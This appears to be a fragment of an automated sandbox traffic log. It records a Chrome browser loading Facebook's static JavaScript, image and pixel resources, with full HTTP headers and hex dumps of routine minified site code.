                                                                                                                                                                                                                                Data Ascii: 47,c,typeof c);return a===1?[i,c,"*"]:[c,"*"]},getGenderVariations:function(a){a&b("IntlVariations").BITMASK_GENDER||g(0,11648,a,typeof a);return[a,"*"]}};e.exports=a}),null);__d("IntlVariationResolver",["IntlVariationHoldout","IntlVariationResolverImpl"
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 62 3a 61 2e 73 65 72 69 61 6c 69 7a 65 72 29 3b 64 3d 63 2e 6c 65 6e 67 74 68 3e 30 3f 22 3f 22 3a 22 22 3b 62 3d 61 2e 66 72 61 67 6d 65 6e 74 21 3d 3d 22 22 3f 22 23 22 2b 61 2e 66 72 61 67 6d 65 6e 74 3a 22 22 3b 61 3d 61 2e 66 72 61 67 6d 65 6e 74 3d 3d 3d 22 22 26 26 61 2e 66 72 61 67 6d 65 6e 74 53 65 70 61 72 61 74 6f 72 3f 22 23 22 3a 22 22 3b 72 65 74 75 72 6e 22 22 2b 65 2b 66 2b 67 2b 68 2b 64 2b 63 2b 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 21 31 29 3b 69 66 28 21 64 26 26 28 65 7c 7c 75 28 61 29 29 29 7b 72 65 74 75 72 6e 28 64 3d 62 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 7d 72 65 74 75 72 6e 20 73 28 63 2c 66 29 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                Data Ascii: =null?b:a.serializer);d=c.length>0?"?":"";b=a.fragment!==""?"#"+a.fragment:"";a=a.fragment===""&&a.fragmentSeparator?"#":"";return""+e+f+g+h+d+c+a+b}function z(a,b,c,d,e,f){e===void 0&&(e=!1);if(!d&&(e||u(a))){return(d=b)!=null?d:""}return s(c,f)}function
                                                                                                                                                                                                                                2024-09-29 04:54:18 UTC660INData Raw: 61 73 68 3b 72 65 74 75 72 6e 20 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 6e 75 6c 6c 26 26 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 3d 22 4e 4f 5f 49 4e 4c 49 4e 45 22 3f 6e 65 77 28 63 28 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 22 29 29 28 62 2c 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 2c 64 2c 65 29 3a 63 28 22 46 62 74 52 65 73 75 6c 74 22 29 2e 67 65 74 28 61 29 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 69 73 53 74 72 69 6e 67 4e 75 6c 6c 4f 72 45 6d 70 74 79 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63
                                                                                                                                                                                                                                Data Ascii: ash;return c("FbtResultGK").inlineMode!=null&&c("FbtResultGK").inlineMode!=="NO_INLINE"?new(c("InlineFbtResult"))(b,c("FbtResultGK").inlineMode,d,e):c("FbtResult").get(a)}g["default"]=a}),98);__d("isStringNullOrEmpty",[],(function(a,b,c,d,e,f){"use stric


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.2.449774157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC592OUTGET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: mSPkTjocO3asr/CIDMBqtw==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 17:13:26 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: ToNDTQmI806W/PTW093CMF8BCdyROaGrzuQagBW81OmeiT0kVmoLUnNpX2/qV/ZQ98b1eflgyFiX2oTzNDCazw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:19 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 50088
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC15861INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 73 79 6e 63 44 4f 4d 22 2c 5b 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 46 42 4c 6f 67 67 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 69 6e 76 6f 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 65 5b 30 5d 2c 67 3d 65 5b 31 5d 2c 68 3d 65 5b 32 5d 3b 65 3d 65 5b 33 5d 3b 68 3d 68 26 26 63 7c 7c 6e 75 6c 6c 3b 67 26 26 28 68 3d 62 28 22 44 4f 4d 22 29 2e 73 63 72 79 28 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 67 29 5b 30 5d 29 3b 68 7c 7c 62 28 22 46 42 4c 6f 67 67 65 72 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger"
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC16384INData Raw: 65 20 64 69 73 70 6c 61 79 20 73 74 61 72 74 65 64 2e 20 54 68 69 73 20 69 73 20 61 20 6e 6f 2d 6f 70 2e 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 76 61 72 20 61 2c 62 3d 6e 65 77 28 63 28 22 44 65 66 65 72 72 65 64 22 29 29 28 29 3b 65 2e 70 75 73 68 28 62 2e 67 65 74 50 72 6f 6d 69 73 65 28 29 29 3b 72 65 74 75 72 6e 20 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 67 75 61 72 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 29 2c 62 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 44 69 73 70 6c 61 79 42 6c 6f 63 6b 69 6e 67 45 76 65 6e 74 22 2c 7b 70 72 6f 70 61 67 61 74 69 6f 6e 54 79 70 65 3a 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 50 72
                                                                                                                                                                                                                                Data Ascii: e display started. This is a no-op.");return function(){}}var a,b=new(c("Deferred"))();e.push(b.getPromise());return c("TimeSlice").guard(function(){a&&c("clearTimeout")(a),b.resolve()},"AsyncRequestDisplayBlockingEvent",{propagationType:c("TimeSlice").Pr
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC16384INData Raw: 2e 61 62 6f 72 74 28 29 3b 61 2e 73 65 74 54 72 61 6e 73 70 6f 72 74 45 72 72 6f 72 48 61 6e 64 6c 65 72 28 64 29 7d 61 2e 61 62 6f 72 74 48 61 6e 64 6c 65 72 28 29 3b 4b 2e 75 6e 73 63 68 65 64 75 6c 65 28 61 29 7d 29 7d 3b 65 2e 61 62 61 6e 64 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 63 6f 6e 74 69 6e 75 61 74 69 6f 6e 2e 6c 61 73 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3b 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 2e 74 69 6d 65 72 29 3b 61 2e 73 65 74 4f 70 74 69 6f 6e 28 22 73 75 70 70 72 65 73 73 45 72 72 6f 72 41 6c 65 72 74 73 22 2c 21 30 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 62 3d 63 28 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 29 29 2e 73 65 74 45 72 72 6f 72 48 61
                                                                                                                                                                                                                                Data Ascii: .abort();a.setTransportErrorHandler(d)}a.abortHandler();K.unschedule(a)})};e.abandon=function(){var a=this;this.continuation.last(function(){var b;c("clearTimeout")(a.timer);a.setOption("suppressErrorAlerts",!0).setHandler(b=c("emptyFunction")).setErrorHa
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1458INData Raw: 2c 63 3b 28 61 3d 62 28 22 41 72 62 69 74 65 72 22 29 29 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 68 2c 5b 28 63 3d 62 28 22 50 61 67 65 45 76 65 6e 74 73 22 29 29 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 69 2c 5b 63 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 63 2e 42 49 47 50 49 50 45 5f 4f 4e 4c 4f 41 44 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 73 75 62 73 63 72 69 62 65 28 63 2e 4e 41 54 49 56 45 5f 4f 4e 42 45 46 4f 52 45 55 4e 4c 4f 41 44 2c 66 75 6e 63
                                                                                                                                                                                                                                Data Ascii: ,c;(a=b("Arbiter")).registerCallback(h,[(c=b("PageEvents")).BIGPIPE_DOMREADY,b("InitialJSLoader").INITIAL_JS_READY]);a.registerCallback(i,[c.BIGPIPE_DOMREADY,c.BIGPIPE_ONLOAD,b("InitialJSLoader").INITIAL_JS_READY]);a.subscribe(c.NATIVE_ONBEFOREUNLOAD,func


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                27192.168.2.449779157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC654OUTGET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: OcEdZWIg79UvSWVADRSQCg==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 02:00:53 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: UlPkWYsS18SYgXc6G9LoG4v5mIuPRr3pkH/2RcSd332QoKb28KeFNwPiZuURFxV5EOiQxlbSLWBI3o+9bjXUgA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:19 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 95
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC94INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 0a a0 33 31 78 00 00 00 0a 49 44 41 54 08 1d 63 60 00 00 00 02 00 01 cf c8 35 e5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDR%VPLTEz=tRNS31xIDATc`5IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                28192.168.2.449777157.240.0.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC689OUTGET /security/hsts-pixel.gif HTTP/1.1
                                                                                                                                                                                                                                Host: facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1715INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC54INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2bGIF89a!,D;0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                29192.168.2.449773157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC581OUTGET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: rDEOmqaAM5ZkPMcF0pIIHw==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 18:03:57 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: hRmGUuQ2ODDByuTT1cHvDlZWF4cRURchQGls5v08WF/6rIPgjkgua/l5LerpwOCuuDCebk9bBL65+owsCZZrLA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:19 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 5493
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
